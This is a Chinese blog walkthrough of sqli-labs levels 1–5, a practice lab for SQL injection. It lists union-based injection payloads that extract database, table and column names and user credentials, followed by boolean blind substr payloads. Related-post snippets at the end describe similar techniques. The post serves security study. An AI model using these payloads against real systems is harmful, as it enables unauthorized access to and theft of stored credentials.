sqli-labs 前五关

最新推荐文章于 2024-05-22 11:58:15 发布
最新推荐文章于 2024-05-22 11:58:15 发布
阅读量4.4k 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64361111/article/details/123120051
版权
本文探讨了字符型和数字型注入漏洞,通过示例展示了如何利用SQL注入执行SQL命令,包括字段判断、回显位置获取、数据库名称窃取、表名和字段名获取,以及数据泄露。重点介绍了布尔型盲注的破解方法,强调了安全防范措施的重要性。
摘要由CSDN通过智能技术生成

less-1

输入?id=1 ,?id=1 and 1=1 ,?id=1 and 1=2 都显示正常 说明不是数字型注入

输入?id=1' 报错 输入 ?id=1' and '1'='1 显示正常,输入?id=1' and '1'='2 显示错误

说明存在字符型漏洞

输入?id=1' order by 1 --+ //判断字段

经过测试有三个字段

输入?id=-1' union select 1,2,3 --+ 判断回显位置

输入?id=-1' union select 1,2,database() --+ 获取当前数据库名

输入 ?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security' --+ 获取表名

输入?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+ 获取字段名

 

输入?id=-1' union select 1,2,concat_ws(',',id,username,password)from security.users limit 0,1--+

逐条获取数据

less-2

输入?id=1 正常显示

输入?id=1 and 1=1 正常显示

 

 

输入?id=1 and1=2 不显示

证明存在数字型注入

输入?id=1 order by 1 判断字段数  经验证为三个字段

输入?id=-1 union select 1,2,3 判断回显位置

输入 ?id=-1 union select 1,2,database()  获取当前数据库名

输入?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security' 获取表名

 

  ?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users' //获取字段名

 

 

?id=-1 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+

 逐条获取数据

 less-3

输入?id=1 ,?id=1 and 1=1 ,?id=1 and 1=2 都显示正常 说明不是数字型注入

输入?id=1' , ?id=1' --+ 都报错,说明闭合符号不对

经过尝试发现闭合符号为')

 输入?id=1') order by 1--+ 判断字段数,结果为三

?id=-1') union select 1,2,3--+ 判断回显位置

?id=-1') union select 1,2,database()--+ 获取当前数据库名

?id=-1') union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+ 获取表名

 

 ?id=-1') union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+ 获取字段名

?id=-1') union select 1,2,concat_ws(',',id,username,password)from security.users limit 0,1--+

逐条获取全部数据

 less-4

闭合符号为")

?id=1") order by 1 --+判断字段数 结果为3

?id=-1") union select 1,2,3--+ 判断回显位置

?id=-1") union select 1,2,database()--+ 获取数据库名

?id=-1") union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+ 获取表名

 

 ?id=-1") union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+

获取字段名

 

 ?id=-1") union select 1,2,concat_ws(',',id,username,password)from security.users limit 0,1--+

逐条获取数据

 

 

 less-5

 这是一个闭合字符为 ' 的布尔型盲注 只能通过一个字母一个字母的猜测,从而达到想要的值

?id=1' and length(database())=8--+ //猜测数据库名的长度

?id=1' and substr(database(),1,1)='s'--+ // 逐个猜测数据库名的字母,对了返回you are in..

?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'--+ //逐个猜测数据库表的名字

?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='users'  limit 0,1),1,1)='i'--+

//逐个字母猜测表 的字段名

?id=1' and substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1)='a' --+//逐个字母 猜测数据的值

这需要有足够的耐心

 

 

 

 

路上人行
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最详细sqli-labs平台十关讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 3302
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
sqli-labs第五关sql注入流程
qq_33598708的博客
03-30 5757
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。 所以这关的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
sqli-labs闯关笔记
sweetie 的博客
12-03 160
文章目录第一关 第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 http://sqli-labs:84/Less-1/?id=1 and 1=2--+ %20是空格 2.在id后面加上’,发现页面回显不正常,表示可能存在SQL字符注入 http://sqli-labs:84/Less-1/?id=1' %27是单引号 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 ...
sqli-labs第五关
qq_73722777的博客
03-02 708
于是我们尝试使用报错注入的方法对网页进行注入测试,这里我们使用dateupxml()语句进行报错注入。用以下语句进行名字-密码的分开输出,其中floor(rand(0)*2),count(*)为报错语句。此时的一个用户的用户名和密码获取完毕,继续获取第二个用户的数据。尝试对其进行联合搜索,但是输出结果不变,说明不能进行联合搜索。因此我们得知第五关应该为数字类型,于是尝试对其查询行数。此时可以发现数据输出不完全,需要分组对数据进行输出。得到结果超出行数,于是重新尝试3行。此时没有报错,说明行显数为3。
sqli-labs 第五关
m0_63711447的博客
04-01 4566
五关可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
sqli-labs---第五关
最新发布
2201_75556700的博客
05-22 647
7、查询email_id中的值(这里就拿到了用户email信息)根据页面的提示可以知道这是单引号'的闭合方式,并且是报错注入。5、查字段USER中的信息,这里查不出来,那就换一张表。id=1(没有正常显示)提示了一串字符。6、查询emails 这张表中的字段信息。3、查询表名(看到敏感表users)4、查询users表中字段的信息。id=1'(出现了错误提示)
sqli-labs第五关(配合布尔盲注以及python脚本))
加油~
05-11 1195
进入第五关,正常显示如下:![image.png](https://img-blog.csdnimg.cn/img_convert/fb62cfcc13c424b26cdbc08d0250f9eb.png#clientId=udf7edcfc-d50d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=864&id=u753066f5&margin=[object Object]&name=
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1825
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs Less-25、25a(sqli-labs闯关指南 25、25a)
m0_54899775的博客
12-25 939
sqli-labs Less-25、25a(sqli-labs闯关指南 25、25a)
sqli-labs Less-58、59、60、61(sqli-labs闯关指南 58、59、60、61)
m0_54899775的博客
12-30 1358
sqli-labs Less-58、59、60、61(sqli-labs闯关指南 58、59、60、61)
sqli练习1-5关(超详细)
橙子鱼的博客
02-14 401
sqli练习1-5关(超详细)
sqli-labs 第一关到第五关通关
three_year的博客
10-02 500
本文是基于docker搭建sqli-labs,不知道怎么搭建的话请看Linux安装docker和配置sqli-labs Less-01 从题目的提示我们可以知道题目需要我们传递一个id的值,我们传递一个1进行尝试 可以看到显示了登录用户名和密码,接着我们对其进行判断是字符型注入还是数字型注入 经过尝试我们得到报错信息,可以得知这一题是字符型注入,使用单引号进行闭合,我们再进行对传递的参数后面的语句进行注释 这里使用的是–+进行注释,接着使用order by判断列数 经过尝试,得到列数为三列,接下来我们就可
sqli-labs-master第五关Less-5 Double Query- Single:方式一
weixin_34365417的博客
11-12 565
由于第三四关和第一第二关大致相同,我就不写了。 接下来来写第五关的第一种方式。 1,目标网站: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 当传递的ID为1的时候提示“you are in” 2,查找注入点: http://127.0.0.1/sqli-labs-master/Le...
基于Sqli-Labs靶场的SQL注入-第五关(重点讲双查询注入)
Joker
11-19 4122
双查询是指两个查询语句的嵌套,也就是一个select语句中在去套一个select语句,然后利用group by 语句和floor函数的结合去报错,再将我们需要的信息显示到报错信息中。
sqlilabs第五关布尔盲注(burpsuite版)
xnxqwzy的博客
04-20 905
一.判断有无注入点及注入类型:id=1​编辑id=1’(这里可以看到页面显示sql语句报错信息,基本可以判定为’闭合)​编辑补全后查看页面效果(1=1时有返回页面,1=2时无返回页面,无报错信息,符合页面布尔类型状态,尝试使用布尔型注入)1.页面没有回显不能用联合查询(order by、union select ),页面没有报错信息不能用报错注入。2.页面布尔类型状态:页面无回显且无报错信息。id=1’ – +​编辑​编辑​编辑猜测数据库长度:(若是猜错,没有返回页面)​编辑。
sqli-labs 1-5关
qq_41326328的博客
03-28 1235
这次写一个关于sql注入的闯关游戏,叫sqli-liabs,这个源码在网上搜索一下sqli-liabs源码下载,放到phpstudy环境里, 注意:这里把phpstudy版本调到5.5,别问我为什么,厂长是我的表哥 下面先说一下, 注入分为数字型注入和字符串型注入 区别: ?id=1 and 1=1 ?id=2 and 1=2 回显不一致则为数字型注入,回显一致的话再继续判断 ?di=1’ ...
基础漏洞系列(五)—— SQLI注入点判断
柠檬木有枝
01-22 409
https://github.com/jlkl/Basic_vulnerability/blob/master/SQLI%E6%B3%A8%E5%85%A5%E7%82%B9%E5%88%A4%E6%96%AD.xmind?raw=true 参考链接 SQL注入之注入点类型判断 工sql注入判断是否存在注入点 ...
sql-labs 闯关 5~10
qq_44663230的博客
08-14 1657
sql-labs 第5~10关 盲注系列
sqli-labs第五关解法
10-14
sqli-labs第五关是一个基于时间的盲注漏洞,需要使用时间延迟来判断SQL语句的执行结果。以下是解题步骤: 1. 在输入框中输入 `' and if(substr(database(),1,1)='s',sleep(5),1)#`,其中 `substr(database(),1,1)` 表示获取数据库名的第一个字符。 2. 如果页面在5秒后有响应,则说明条件成立,即数据库名的第一个字符为 `s`。 3. 依次使用 `substr()` 函数获取数据库名的每个字符,直到获取完整个数据库名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值